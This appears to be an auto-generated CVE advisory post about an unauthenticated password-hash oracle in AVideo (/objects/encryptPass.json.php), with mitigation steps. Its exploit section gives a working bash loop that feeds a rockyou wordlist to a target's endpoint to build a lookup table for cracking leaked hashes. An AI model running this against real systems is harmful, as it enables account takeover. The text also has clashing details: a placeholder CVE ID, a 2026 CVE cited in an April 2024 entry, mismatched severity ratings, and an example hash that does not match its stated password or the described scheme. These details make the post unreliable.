AVideo, Information Disclosure, CVE-2024-XXXX (High)

Listen to this Post

The vulnerability exists in the file /objects/encryptPass.json.php, which is accessible without any authentication. This endpoint accepts a user-supplied password via the `pass` parameter and returns its hashed equivalent. The hash is generated by the `encryptPassword()` function found in /objects/functions.php. This function creates a hash by concatenating SHA1, Whirlpool, and MD5 algorithms. Critically, by default, the configuration option `encryptPasswordsWithSalt` is disabled, meaning no site-specific salt is added to the password before hashing. This makes the hashing process deterministic. An attacker can query this endpoint with a list of common passwords (like from the `rockyou.txt` wordlist) and record the resulting hashes. If the attacker later obtains the actual password hashes from the database (via a separate SQL injection or data leak), they can instantly compare them against their precomputed list, effectively cracking the passwords without any offline computation. This endpoint also reveals the exact hashing implementation and whether a salt is used, which is sensitive cryptographic information.

dailycve form:

Platform: AVideo
Version: <= 25.0
Vulnerability : Hash Oracle
Severity: High
date: April 2024

Prediction: No official patch

What Undercode Say:

Analytics

The attack surface is significant because the vulnerable endpoint requires no authentication and the hashing algorithm is both weak and unsalted by default. The primary attack vector is chaining this hash oracle with a database leak (e.g., CVE-2026-28501, an unauthenticated SQL injection ). Once an attacker dumps the `users` table, they can use the oracle to crack admin passwords instantly. The lack of salting means that two users with the same password will have identical hashes, making mass cracking even faster. The disclosure of the hashing logic also aids in offline cracking of other stolen credential databases.

How Exploit:

The following bash one-liner demonstrates how to build a rainbow table using the vulnerable endpoint:

Example: Generate hashes for the top 1000 passwords from rockyou.txt
Replace TARGET with the actual AVideo instance URL
for pass in $(head -1000 /usr/share/wordlists/rockyou.txt); do
hash=$(curl -s "http://TARGET/objects/encryptPass.json.php?pass=${pass}" | jq -r .encryptedPassword)
echo "${pass}:${hash}" >> avideo_rainbow.txt
done

Once an attacker has the database dump (e.g., via SQLi), they can crack it instantly:

Assuming the database leak gave us "admin:5f4dcc3b5aa765d61d8327deb882cf99"
grep "5f4dcc3b5aa765d61d8327deb882cf99" avideo_rainbow.txt
Output: password123:5f4dcc3b5aa765d61d8327deb882cf99

Alternatively, for a live attack without precomputation, an attacker can loop through the leaked usernames and hashes, submitting them to a login endpoint after verifying the hash format via the oracle.

Protection from this CVE

  1. Disable the Endpoint: Remove or restrict access to `/objects/encryptPass.json.php` via web server configuration (e.g., `.htaccess` or Nginx deny rules).
  2. Enable Salting: In the AVideo admin panel, navigate to Advanced Customization and enable encryptPasswordsWithSalt. Ensure a strong, unique `global[‘salt’]` is set in your configuration file. This will make hashes non-deterministic and break the oracle’s usefulness.
  3. Upgrade: Monitor the official AVideo repository for a patch that removes this debug functionality or implements proper access controls.

Impact

Critical. This vulnerability effectively nullifies the security of password hashes if the database is ever compromised. It accelerates password cracking from “difficult” (requiring reverse engineering or GPU cracking) to “instant” (requiring a simple web request). Combined with the weak multi-hashing algorithm, it provides no protection against brute-force or dictionary attacks. The exposure of the internal hashing logic also weakens the overall cryptographic posture of the application, aiding attackers in developing further exploits .

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top